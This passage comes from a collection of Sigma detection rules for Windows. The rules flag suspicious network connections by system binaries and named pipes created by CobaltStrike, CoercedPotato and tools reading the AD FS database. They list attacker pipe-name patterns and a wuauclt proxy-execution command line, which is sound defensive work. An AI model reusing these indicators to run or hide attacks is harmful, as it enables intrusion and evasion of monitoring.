  {
    "path": "rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml",
    "content": "title: Outbound Network Connection To Public IP Via Winlogon\nid: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b\nstatus: test\ndescription: Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io\ndate: 2023-04-28\nmodified: 2024-03-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1218.011\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winlogon.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml",
    "content": "title: Suspicious Wordpad Outbound Connections\nid: 786cdae8-fefb-4eb2-9227-04e34060db01\nstatus: test\ndescription: |\n    Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\n    This might indicate potential process injection activity from a beacon or similar mechanisms.\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\wordpad.exe'\n    filter_main_ports:\n        DestinationPort:\n            - 80\n            - 139\n            - 443\n            - 445\n            - 465\n            - 587\n            - 993\n            - 995\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Other ports can be used, apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml",
    "content": "title: Local Network Connection Initiated By Script Interpreter\nid: 08249dc0-a28d-4555-8ba5-9255a198e08c\nrelated:\n    - id: 992a6cae-db6a-43c8-9cec-76d7195c96fc\n      type: derived\nstatus: test\ndescription: |\n    Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113\ndate: 2022-08-28\nmodified: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        # Note: This list is added to avoid duplicate alerting with 992a6cae-db6a-43c8-9cec-76d7195c96fc\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection\nfalsepositives:\n    - Legitimate scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Script Interpreter\nid: 992a6cae-db6a-43c8-9cec-76d7195c96fc\nrelated:\n    - id: 08249dc0-a28d-4555-8ba5-9255a198e08c\n      type: derived\nstatus: test\ndescription: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-28\nmodified: 2024-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_ms_ranges:\n        DestinationIp|cidr: '20.0.0.0/11' # Microsoft range, caused some FPs\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate scripts\nlevel: high\n"
  },
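The two script-interpreter rules above (08249dc0 and 992a6cae) split the same `network_connection` events by whether `DestinationIp` falls inside the loopback/RFC 1918/link-local list, and 992a6cae additionally drops Microsoft's 20.0.0.0/11 to silence false positives; the winlogon rule above and the wuauclt rule that follows use the same filter shape. The Python below is an added example, not code from the SigmaHQ repository: it reimplements both rules with the standard `ipaddress` module and runs them over a handful of constructed Sysmon Event ID 3 records. The IPv4-mapped IPv6 normalization (`::ffff:a.b.c.d`) is an addition of the example, not something the rule text does; how a real backend's `cidr` modifier treats such addresses is worth checking before relying on the filter.

```python
import ipaddress

# CIDR list copied from filter_main_local_ranges in Sigma rule 992a6cae-db6a-43c8-9cec-76d7195c96fc;
# rule 08249dc0-a28d-4555-8ba5-9255a198e08c uses the same list as its positive selection.
LOCAL_RANGES = [ipaddress.ip_network(c) for c in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7",
)]
# filter_main_ms_ranges in 992a6cae: Microsoft range excluded because it caused false positives.
MS_RANGES = [ipaddress.ip_network("20.0.0.0/11")]
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")


def _to_address(ip_text, normalize_mapped=True):
    """Parse a Sysmon DestinationIp string. An IPv4-mapped IPv6 address (::ffff:a.b.c.d)
    is collapsed to IPv4 when normalize_mapped is set. The rule text itself does no such
    normalization; this is an assumption of the example, not of Sigma."""
    ip = ipaddress.ip_address(ip_text)
    mapped = getattr(ip, "ipv4_mapped", None)
    return mapped if (normalize_mapped and mapped is not None) else ip


def in_ranges(ip_text, ranges, normalize_mapped=True):
    """Sigma |cidr semantics: true if the address lies in any listed network.
    ipaddress answers False on a version mismatch (IPv6 address vs IPv4 network)."""
    ip = _to_address(ip_text, normalize_mapped)
    return any(ip in net for net in ranges)


def _selection(ev):
    # Selection shared by both rules: Initiated and Image|endswith (case-insensitive in Sigma).
    return ev.get("Initiated") == "true" and ev.get("Image", "").lower().endswith(SCRIPT_HOSTS)


def local_rule_matches(ev, normalize_mapped=True):
    """08249dc0: condition: selection (script host talking to a local/private destination)."""
    return _selection(ev) and in_ranges(ev["DestinationIp"], LOCAL_RANGES, normalize_mapped)


def outbound_rule_matches(ev, normalize_mapped=True):
    """992a6cae: selection and not 1 of filter_main_* (local ranges, Microsoft 20.0.0.0/11)."""
    return (_selection(ev)
            and not in_ranges(ev["DestinationIp"], LOCAL_RANGES, normalize_mapped)
            and not in_ranges(ev["DestinationIp"], MS_RANGES, normalize_mapped))


def classify(ev, normalize_mapped=True):
    """Return which of the two rules fires for an event: 'local', 'outbound' or 'none'."""
    if local_rule_matches(ev, normalize_mapped):
        return "local"
    if outbound_rule_matches(ev, normalize_mapped):
        return "outbound"
    return "none"


# Constructed Sysmon Event ID 3 records (only the fields the rules read); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\wscript.exe", "Initiated": "true", "DestinationIp": "192.168.10.5"},
    {"Image": "C:\\Windows\\SysWOW64\\cscript.exe", "Initiated": "true", "DestinationIp": "203.0.113.7"},
    {"Image": "C:\\Windows\\System32\\wscript.exe", "Initiated": "true", "DestinationIp": "20.20.1.10"},
    {"Image": "C:\\Windows\\System32\\WScript.exe", "Initiated": "true", "DestinationIp": "fe80::1ff:fe23:4567:890a"},
    {"Image": "C:\\Windows\\System32\\wscript.exe", "Initiated": "true", "DestinationIp": "::ffff:10.1.2.3"},
    {"Image": "C:\\Windows\\System32\\wscript.exe", "Initiated": "false", "DestinationIp": "203.0.113.7"},
    {"Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": "true", "DestinationIp": "203.0.113.7"},
]


def evaluate(events=SAMPLE_EVENTS, normalize_mapped=True):
    """Pair each event's DestinationIp with the rule that fires for it."""
    return [(ev["DestinationIp"], classify(ev, normalize_mapped)) for ev in events]


if __name__ == "__main__":
    for dst, verdict in evaluate():
        print(f"{dst:<28} -> {verdict}")
    # Same record without mapped-address normalization: the address escapes the local filter.
    print("::ffff:10.1.2.3 unnormalized ->", classify(SAMPLE_EVENTS[4], normalize_mapped=False))
```

Two things the output makes visible: a script host talking to 20.20.1.10 triggers neither rule, which is the detection gap the Microsoft exclusion opens, and the mapped address `::ffff:10.1.2.3` is classified as local only because the example collapses it first; without that step it reads as a public destination and fires the high-severity outbound rule.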
  {
    "path": "rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml",
    "content": "title: Potentially Suspicious Wuauclt Network Connection\nid: c649a6c7-cd8c-4a78-9c04-000fc76df954\nstatus: test\ndescription: |\n    Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\n    One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2024-03-12\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: network_connection\n    product: windows\n    definition: 'Requirements: The CommandLine field enrichment is required in order for this rule to be used.'\ndetection:\n    selection:\n        Image|contains: 'wuauclt'\n        CommandLine|contains: ' /RunHandlerComServer'\n    # \"C:\\WINDOWS\\uus\\AMD64\\wuauclt.exe\" /DeploymentHandlerFullPath \\\\?\\C:\\Windows\\UUS\\AMD64\\UpdateDeploy.dll /ClassId aaa256e1-5b21-4993-9188-18f07ccb3b98 /RunHandlerComServer\n    filter_main_ip:\n        DestinationIp|cidr: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_msrange:  # Sysmon\n        DestinationIp|cidr:\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.79.0.0/16' # Microsoft Corporation\n            - '51.10.0.0/15'\n            - '51.103.0.0/16' # Microsoft Corporation\n            - 
'51.104.0.0/15' # Microsoft Corporation\n            - '52.224.0.0/11' # Microsoft Corporation\n    filter_main_uus:\n        CommandLine|contains:\n            - ':\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId'\n            - ':\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId'\n    filter_main_winsxs:\n        CommandLine|contains|all:\n            - ':\\Windows\\WinSxS\\'\n            - '\\UpdateDeploy.dll /ClassId '\n    filter_main_cli_null:\n        CommandLine: null\n    filter_main_cli_empty:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml",
    "content": "title: ADFS Database Named Pipe Connection By Uncommon Tool\nid: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3\nstatus: test\ndescription: |\n    Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\n    Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml\n    - https://o365blog.com/post/adfs/\n    - https://github.com/Azure/SimuLand\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2021-10-08\nmodified: 2023-11-30\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? 
You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\MICROSOFT##WID\\tsql\\query'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\system32\\svchost.exe'\n            - ':\\Windows\\System32\\wsmprovhost.exe'\n            - ':\\Windows\\SysWOW64\\mmc.exe'\n            - ':\\Windows\\SysWOW64\\wsmprovhost.exe'\n            - ':\\Windows\\WID\\Binn\\sqlwriter.exe'\n            - '\\AzureADConnect.exe'\n            - '\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - '\\Microsoft.IdentityServer.ServiceHost.exe'\n            - '\\Microsoft.Tri.Sensor.exe'\n            - '\\sqlservr.exe'\n            - '\\tssdis.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml",
    "content": "title: CobaltStrike Named Pipe\nid: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\nrelated:\n    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns\n      type: similar\n    - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe as used by CobaltStrike\nreferences:\n    - https://twitter.com/d4rksystem/status/1357010969264873472\n    - https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/\n    - https://github.com/SigmaHQ/sigma/issues/253\n    - https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/\n    - https://redcanary.com/threat-detection-report/threats/cobalt-strike/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-25\nmodified: 2022-10-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? 
You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection_MSSE:\n        PipeName|contains|all:\n            - '\\MSSE-'\n            - '-server'\n    selection_postex:\n        PipeName|startswith: '\\postex_' # Also include the pipe \"\\postex_ssh_\"\n    selection_status:\n        PipeName|startswith: '\\status_'\n    selection_msagent:\n        PipeName|startswith: '\\msagent_'\n    selection_mojo:\n        PipeName|startswith: '\\mojo_'\n    selection_interprocess:\n        PipeName|startswith: '\\interprocess_'\n    selection_samr:\n        PipeName|startswith: '\\samr_'\n    selection_netlogon:\n        PipeName|startswith: '\\netlogon_'\n    selection_srvsvc:\n        PipeName|startswith: '\\srvsvc_'\n    selection_lsarpc:\n        PipeName|startswith: '\\lsarpc_'\n    selection_wkssvc:\n        PipeName|startswith: '\\wkssvc_'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml",
    "content": "title: CobaltStrike Named Pipe Pattern Regex\nid: 0e7163d4-9e19-4fa7-9be6-000c61aad77a\nrelated:\n    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns\n      type: similar\n    - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles\nreferences:\n    - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n    - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-30\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? 
You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        - PipeName|re: '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}'\n        - PipeName|re: '\\\\wkssvc_?[0-9a-f]{2}'\n        - PipeName|re: '\\\\ntsvcs[0-9a-f]{2}'\n        - PipeName|re: '\\\\DserNamePipe[0-9a-f]{2}'\n        - PipeName|re: '\\\\SearchTextHarvester[0-9a-f]{2}'\n        - PipeName|re: '\\\\mypipe-(?:f|h)[0-9a-f]{2}'\n        - PipeName|re: '\\\\windows\\.update\\.manager[0-9a-f]{2,3}'\n        - PipeName|re: '\\\\ntsvcs_[0-9a-f]{2}'\n        - PipeName|re: '\\\\scerpc_?[0-9a-f]{2}'\n        - PipeName|re: '\\\\PGMessagePipe[0-9a-f]{2}'\n        - PipeName|re: '\\\\MsFteWds[0-9a-f]{2}'\n        - PipeName|re: '\\\\f4c3[0-9a-f]{2}'\n        - PipeName|re: '\\\\fullduplex_[0-9a-f]{2}'\n        - PipeName|re: '\\\\msrpc_[0-9a-f]{4}'\n        - PipeName|re: '\\\\win\\\\msrpc_[0-9a-f]{2}'\n        - PipeName|re: '\\\\f53f[0-9a-f]{2}'\n        - PipeName|re: '\\\\rpc_[0-9a-f]{2}'\n        - PipeName|re: '\\\\spoolss_[0-9a-f]{2}'\n        - PipeName|re: '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml",
    "content": "title: CobaltStrike Named Pipe Patterns\nid: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7\nrelated:\n    - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex\n      type: similar\n    - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles\nreferences:\n    - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n    - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nauthor: Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-01-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - stp.1k\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? 
You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection_malleable_profile_generic:\n        - PipeName|startswith:\n              - '\\DserNamePipe'\n              - '\\f4c3'\n              - '\\f53f'\n              - '\\fullduplex_'\n              - '\\mojo.5688.8052.183894939787088877'\n              - '\\mojo.5688.8052.35780273329370473'\n              - '\\MsFteWds'\n              - '\\msrpc_'\n              - '\\mypipe-f'\n              - '\\mypipe-h'\n              - '\\ntsvcs'\n              - '\\PGMessagePipe'\n              - '\\rpc_'\n              - '\\scerpc'\n              - '\\SearchTextHarvester'\n              - '\\spoolss'\n              - '\\win_svc'\n              - '\\win\\msrpc_'\n              - '\\windows.update.manager'\n              - '\\wkssvc'\n        - PipeName:\n              - '\\demoagent_11'\n              - '\\demoagent_22'\n    selection_malleable_profile_catalog_change_listener:\n        PipeName|startswith: '\\Winsock2\\CatalogChangeListener-'\n        PipeName|endswith: '-0,'\n    filter_main_generic:\n        PipeName:\n            - '\\wkssvc'\n            - '\\spoolss'\n            - '\\scerpc'\n            - '\\ntsvcs'\n            - '\\SearchTextHarvester'\n            - '\\PGMessagePipe'\n            - '\\MsFteWds'\n    filter_optional_websense:\n        Image|contains:\n            - ':\\Program Files\\Websense\\'\n            - ':\\Program Files (x86)\\Websense\\'\n        PipeName|startswith:\n            - '\\DserNamePipeR'\n            - '\\DserNamePipeW'\n    condition: 1 of selection_malleable_profile_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Chrome instances using the exact same pipe name \"mojo.xxx\"\n    - Websense Endpoint using the pipe name \"DserNamePipe(R|W)\\d{1,5}\"\nlevel: high\n"
  },
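The three CobaltStrike pipe rules above (d5601f8c generic prefixes, 0e7163d4 regexes, 85adeb13 prefix patterns with exclusions) encode the same intelligence at different precision, and one Sigma detail decides how they disagree: plain string modifiers (`startswith`, `endswith`, `contains`, bare equality) match case-insensitively, while `|re` is a case-sensitive, unanchored search. The Python below is an added example, not code from the SigmaHQ repository. It reimplements the regex rule and the prefix-pattern rule (including `filter_main_generic` and `filter_optional_websense`) and runs both over constructed Sysmon Event ID 17 pipe names; the sample pipe names and image paths are made up for the example.

```python
import re

# Patterns copied from "CobaltStrike Named Pipe Pattern Regex" (0e7163d4-9e19-4fa7-9be6-000c61aad77a).
# Sigma's |re modifier is an unanchored, case-sensitive search, so re.search() is the right primitive.
REGEX_RULE_PATTERNS = [re.compile(p) for p in (
    r"\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}",
    r"\\wkssvc_?[0-9a-f]{2}", r"\\ntsvcs[0-9a-f]{2}", r"\\DserNamePipe[0-9a-f]{2}",
    r"\\SearchTextHarvester[0-9a-f]{2}", r"\\mypipe-(?:f|h)[0-9a-f]{2}",
    r"\\windows\.update\.manager[0-9a-f]{2,3}", r"\\ntsvcs_[0-9a-f]{2}", r"\\scerpc_?[0-9a-f]{2}",
    r"\\PGMessagePipe[0-9a-f]{2}", r"\\MsFteWds[0-9a-f]{2}", r"\\f4c3[0-9a-f]{2}",
    r"\\fullduplex_[0-9a-f]{2}", r"\\msrpc_[0-9a-f]{4}", r"\\win\\msrpc_[0-9a-f]{2}",
    r"\\f53f[0-9a-f]{2}", r"\\rpc_[0-9a-f]{2}", r"\\spoolss_[0-9a-f]{2}",
    r"\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,",
)]

# Prefixes and exact names from "CobaltStrike Named Pipe Patterns" (85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7).
# Plain Sigma string matching is case-insensitive, so every comparison below lower-cases both sides.
PATTERN_RULE_PREFIXES = (
    "\\DserNamePipe", "\\f4c3", "\\f53f", "\\fullduplex_",
    "\\mojo.5688.8052.183894939787088877", "\\mojo.5688.8052.35780273329370473",
    "\\MsFteWds", "\\msrpc_", "\\mypipe-f", "\\mypipe-h", "\\ntsvcs", "\\PGMessagePipe",
    "\\rpc_", "\\scerpc", "\\SearchTextHarvester", "\\spoolss", "\\win_svc",
    "\\win\\msrpc_", "\\windows.update.manager", "\\wkssvc",
)
PATTERN_RULE_EXACT = ("\\demoagent_11", "\\demoagent_22")
# filter_main_generic: the real RPC endpoint pipes share a prefix with the malleable-profile
# names, so the exact legitimate names are carved back out.
FILTER_GENERIC_EXACT = ("\\wkssvc", "\\spoolss", "\\scerpc", "\\ntsvcs",
                        "\\SearchTextHarvester", "\\PGMessagePipe", "\\MsFteWds")
FILTER_WEBSENSE_IMAGE = (":\\Program Files\\Websense\\", ":\\Program Files (x86)\\Websense\\")


def _ci_startswith(value, prefixes):
    v = value.lower()
    return any(v.startswith(p.lower()) for p in prefixes)


def _ci_equals(value, names):
    return value.lower() in {n.lower() for n in names}


def regex_rule_matches(pipe_name):
    """0e7163d4 condition: selection (any one PipeName|re pattern, case-sensitive)."""
    return any(p.search(pipe_name) for p in REGEX_RULE_PATTERNS)


def pattern_rule_matches(pipe_name, image=""):
    """85adeb13 condition: 1 of selection_malleable_profile_* and not 1 of filter_main_*
    and not 1 of filter_optional_*."""
    selected = (
        _ci_startswith(pipe_name, PATTERN_RULE_PREFIXES)
        or _ci_equals(pipe_name, PATTERN_RULE_EXACT)
        or (_ci_startswith(pipe_name, ("\\Winsock2\\CatalogChangeListener-",))
            and pipe_name.lower().endswith("-0,"))
    )
    if not selected or _ci_equals(pipe_name, FILTER_GENERIC_EXACT):
        return False
    websense = (any(s.lower() in image.lower() for s in FILTER_WEBSENSE_IMAGE)
                and _ci_startswith(pipe_name, ("\\DserNamePipeR", "\\DserNamePipeW")))
    return not websense


# Constructed Sysmon Event ID 17 (PipeCreated) samples as (PipeName, Image); not real telemetry.
SAMPLE_EVENTS = [
    ("\\mojo.5688.8052.183894939787088877a1", "C:\\Windows\\System32\\rundll32.exe"),
    ("\\wkssvc", "C:\\Windows\\System32\\svchost.exe"),
    ("\\wkssvc_7f", "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"),
    ("\\WKSSVC_7F", "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"),
    ("\\Winsock2\\CatalogChangeListener-3a8-0,", "C:\\Windows\\System32\\svchost.exe"),
    ("\\DserNamePipeR12345", "C:\\Program Files\\Websense\\Websense Endpoint\\wepsvc.exe"),
    ("\\DserNamePipeR12345", "C:\\Users\\bob\\Downloads\\loader.exe"),
    ("\\PSHost.133500000000000000.4321.DefaultAppDomain.powershell",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
]


def evaluate(events=SAMPLE_EVENTS):
    """Return {(PipeName, Image): (regex_rule_hit, pattern_rule_hit)} for each sample."""
    return {(pipe, image): (regex_rule_matches(pipe), pattern_rule_matches(pipe, image))
            for pipe, image in events}


if __name__ == "__main__":
    for (pipe, image), (rx, pat) in evaluate().items():
        print(f"{pipe:<48} regex={rx!s:<5} patterns={pat}")
```

The rows worth reading: the legitimate `\wkssvc` endpoint fires neither rule (the regex needs two trailing hex digits, the prefix rule selects it and then `filter_main_generic` removes it), `\WKSSVC_7F` fires only the prefix rule because the regex is case-sensitive, and the same `\DserNamePipeR12345` pipe is suppressed or alerted depending on whether the creating image lives under the Websense directory.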
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml",
    "content": "title: HackTool - CoercedPotato Named Pipe Creation\nid: 4d0083b3-580b-40da-9bba-626c19fe4033\nstatus: test\ndescription: Detects the pattern of a pipe name as used by the hack tool CoercedPotato\nreferences:\n    - https://blog.hackvens.fr/articles/CoercedPotato.html\n    - https://github.com/hackvens/CoercedPotato\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\coerced\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml",
